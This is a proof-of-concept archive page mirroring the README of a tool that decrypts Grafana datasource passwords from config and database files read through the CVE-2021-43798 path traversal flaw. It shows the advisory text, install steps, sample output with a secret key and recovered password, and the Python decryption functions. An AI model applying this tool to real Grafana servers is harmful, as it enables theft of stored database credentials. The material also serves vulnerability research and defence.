Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2021-43798 PoC — Grafana path traversal

Source
https://github.com/Sic4rio/Grafana-Decryptor-for-CVE-2021-43798
Associated Vulnerability
Title:Grafana path traversal (CVE-2021-43798)
Description:Grafana is an open-source platform for monitoring and observability. Grafana versions 8.0.0-beta1 through 8.3.0 (except for patched versions) iss vulnerable to directory traversal, allowing access to local files. The vulnerable URL path is: `<grafana_host_url>/public/plugins//`, where is the plugin ID for any installed plugin. At no time has Grafana Cloud been vulnerable. Users are advised to upgrade to patched versions 8.0.7, 8.1.8, 8.2.7, or 8.3.1. The GitHub Security Advisory contains more information about vulnerable URL paths, mitigation, and the disclosure timeline.
Description
Grafana Decryptor for CVE-2021-43798
Readme

# Grafana Decryptor for CVE-2021-43798

This script decrypts the DataSource passwords from a Grafana instance vulnerable to CVE-2021-43798, which allows unauthorized arbitrary file reading.

## Description

Grafana versions 8.0.0-beta1 through 8.3.0 are vulnerable to a directory traversal vulnerability that allows unauthorized users to read arbitrary files on the server. This script exploits this vulnerability to decrypt DataSource passwords found in the `grafana.db` file using the `secret_key` found in the `grafana.ini` configuration file.

## Requirements

- Python 3.6+
- The following Python libraries:
  - `requests`
  - `questionary`
  - `termcolor`
  - `cryptography`

## Installation

1. Clone the repository or download the script.
2. Install the required Python libraries:
   ```bash
   pip install requests questionary termcolor cryptography
   ```

## Usage

1. Ensure you have the `grafana.db` and `grafana.ini` files from the target Grafana instance.
2. Run the script to decrypt the DataSource passwords.

### Example: Get the DataSource Password

```bash
python decrypt.py
```

### Example: Encrypt a Plaintext Password

You can also encode a plaintext password using the script by uncommenting the example code in the script.

## Script Details

### Deriving the Encryption Algorithm

The script determines the encryption algorithm used by analyzing the payload. The default encryption algorithm is `aes-cfb`.

### Decrypting the Password

Using the derived encryption algorithm and the `secret_key` from `grafana.ini`, the script decrypts the DataSource password.

### Encrypting a Password

The script also includes functionality to encrypt a plaintext password using the same encryption method and `secret_key`.

## Example Output

```
######################################
         GRAFANA DECRYPTOR
CVE-2021-43798 Grafana Unauthorized
arbitrary file reading vulnerability
            SICARI0
######################################

? Enter the datasource password: anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==

[*] grafanaIni_secretKey= SW2YcwTIb9zpOOhoPsMm
[*] DataSourcePassword= anBneWFNQ2z+IDGhz3a7wxaqjimuglSXTeMvhbvsveZwVzreNJSw+hsV4w==
[*] plainText= SuperSecureP@ssw0rd
```

### Decryption and Encryption Functions

```python
def decrypt_gcm(block, payload):
    gcm = Cipher(algorithms.AES(block), modes.GCM(payload[SALT_LENGTH:SALT_LENGTH+12]), backend=default_backend()).decryptor()
    return gcm.update(payload[SALT_LENGTH+12:]) + gcm.finalize()

def decrypt_cfb(block, payload):
    if len(payload) < 16:
        raise ValueError("Payload too short")
    
    iv = payload[SALT_LENGTH:SALT_LENGTH+16]
    payload = payload[SALT_LENGTH+16:]
    decryptor = Cipher(algorithms.AES(block), modes.CFB(iv), backend=default_backend()).decryptor()
    return decryptor.update(payload) + decryptor.finalize()

def encryption_key_to_bytes(secret, salt):
    kdf = PBKDF2HMAC(
        algorithm=hashes.SHA256(),
        length=32,
        salt=salt,
        iterations=10000,
        backend=default_backend()
    )
    return kdf.derive(secret.encode())

def decrypt(payload, secret):
    alg, payload = derive_encryption_algorithm(payload)
    
    if len(payload) < SALT_LENGTH:
        raise ValueError("Unable to compute salt")
    
    salt = payload[:SALT_LENGTH]
    key = encryption_key_to_bytes(secret, salt)
    
    block = algorithms.AES(key)
    
    if alg == AES_GCM:
        return decrypt_gcm(key, payload)
    else:
        return decrypt_cfb(key, payload)

def encrypt(payload, secret):
    salt = os.urandom(SALT_LENGTH)
    key = encryption_key_to_bytes(secret, salt)
    block = algorithms.AES(key)
    
    iv = os.urandom(16)
    encryptor = Cipher(algorithms.AES(key), modes.CFB(iv), backend=default_backend()).encryptor()
    encrypted = encryptor.update(payload) + encryptor.finalize()
    
    return salt + iv + encrypted
```

These functions handle the decryption and encryption processes.



## Contribution

Feel free to open issues or pull requests if you find any bugs or have suggestions for improvements.

## License

This project is licensed under the MIT License. See the [LICENSE](LICENSE) file for details.
File Snapshot

 [4.0K]  /data/pocs/aa3d07d57308685487430e3ec27a0e63b7f0b4a7
├── [4.5K]  decrypt.py
└── [4.1K]  README.md

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →